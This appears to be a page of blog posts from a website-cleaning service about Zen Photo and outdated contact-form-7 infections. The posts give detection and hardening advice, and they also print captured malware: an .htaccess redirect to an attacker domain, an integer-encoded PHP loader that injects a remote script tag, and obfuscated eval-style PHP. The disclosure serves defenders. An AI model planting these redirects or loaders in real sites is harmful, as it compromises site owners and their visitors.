WeWatchYourWebsite

"so you don't have to!"

By

New information on the Zen Photo exploit

While cleaning more websites with Zen Photo installed, we’re finding some new infections.

We’ve been seeing files added called thumbsdata.php. They usually have a string of code like this:

$vf=substr(1,1);foreach(array(10,100,111,99,117,109…{ $l = $_GET[“l”]; } @header(“Location: $l”); exit; }

This is accompanied by an .htaccess file in the same folder with lines similar to this:

ErrorDocument 400 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 401 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 403 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 404 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 500 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}

RewriteEngine On
RewriteRule !thumbsdata.php http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

We’ve seen other domains used as well, but this is just an example.

In the log files we’re seeing strings sent to the c.php file in the root of the Zen Photo installation. This file works with captcha, but apparently doesn’t sanitize the data.

Again, this is in older versions of Zen Photo.

Please update your Zen Photo websites immediately.

Post a comment here if you have more information.

If you need assistance in cleaning this up, please call me at (847)728-0214, Skype: wewatchyourwebsite or email me at: traef@wewatchyourwebsite.com

Thank you.

By

Zen Photo exploited to infect websites

Over the past week we’ve been seeing many photographer’s websites infected through an exploit in Zen Photo. Actually it’s not Zen Photo, but the ajaxfilemanager.php file used in the tiny_mce plugin.

Check your websites for the file: ajaxfilemanger.php and rename it or delete it.

In Zen Photo based websites the above file can be found in:

zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager

The file is accessible from a browser which allows anyone to upload files to your website. Quite often we see files on websites with a .jpg or .png extension, which are normally graphic files, but the files we’re concerned with are actually PHP files. The hackers have many ways of renaming these to .php extensions and then they run them and infect the website.

If your website is hosted on a Linux server, you can use a .htaccess file to protect this file with something like:

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /ajaxfilemanager/.*$ [NC]
RewriteCond %{REQUEST_FILENAME} ^.+\.php$
RewriteRule .* – [F,NS,L]

Which will prevent remote access to all .php files in the ajaxfilemanager folder.

Depending on what version of Zen Photo, we have seen some config.php files with a line:

define(‘CONFIG_QUERY_STRING_ENABLE’, true);

Which appears to allow you send a string that would tell ajaxfilemanager what configuration file to use. This should be set to false.

You can either rename the ajaxfilemanager folder, delete it, use an .htaccess file or make certain your plugins are updated but you have to do something to protect your website.

The most common file we’ve seen in websites infected through this method is:

/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.images.php

And it usually has this code:

(opening php tag followed by a long string of blank spaces)$vf=substr(1,1);foreach(array(10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,39,59,10,10,13,9,92,39,0,112,49,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,102,97,99,101,116,111,102,97,99,101,46,100,101,47,101,120,116,47,62,60,47,115,99,114,105,112,116,62,116,114,117,101,99,115,115) as $vj[0])…unset($vf);unset($vj);(closing php tag)

It is our understanding that the file name is very similar to legitimate files in the same folder.

We’ve been seeing many other backdoors uploaded with this same exploit so you really should have it examined carefully.

Please leave a comment if you found this interesting, if you have more questions about this or have additional information regarding this infection.

As always, if you need help cleaning this up, call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com

Thank you.

By

WordPress websites infected through outdated contact-form-7 plugin

Don’t go blaming the author of the WordPress plugin contact-form-7, but 1,022 of the websites we’ve cleaned in the past 11 days have old versions of the contact-form-7 plugin.

If you have a WordPress based website and you’re finding code like this in your index.php files:

(opening php tag) @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZl..."\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} (closing php tag)

then you probably have an outdated contact-form-7 plugin.

We're not seeing the usual evidence in the log files, so we believe that the infection is a string that is being piped to /dev/null - at least that's our theory.

In your wp-content folder under: /plugins/contact-form-7 open your wp-contact-form-7.php file and look at line 8:

/*
Plugin Name: Contact Form 7
Plugin URI: http://contactform7.com/
Description: Just another contact form plugin. Simple but flexible.
Author: Takayuki Miyoshi
Author URI: http://ideasilo.wordpress.com/
Version: 2.4.4
*/

That will tell you what version you have. Or just edit your index.php file in the root of your site. If you have the code listed at the top of the post, then you probably have an outdated version of contact-form-7 also.

I would like to thank Takayuki Miyoshi for assisting us with finding this. Again, don't blame the author, everyone should be updating their plugins on a regular basis.

Your contact-form-7 version should be 3.0.1 which was released on November 3, 2011 and can be obtained here:

On some infected websites you'll also see a "j" and/or a "js" folder in the plugins folder. These need to be removed as they are part of the infection, but not in all cases.

As always you need to scan your files for any backdoors. We've seen some of these infected sites with backdoors and some without with this website infection. This leads me to believe that the hackers feel it's flying under the radar enough that they don't need a backdoor.

If you need help cleaning this off your sites, call me at (847)728-0214 or email me at: traef@wewatchyourwebsite.com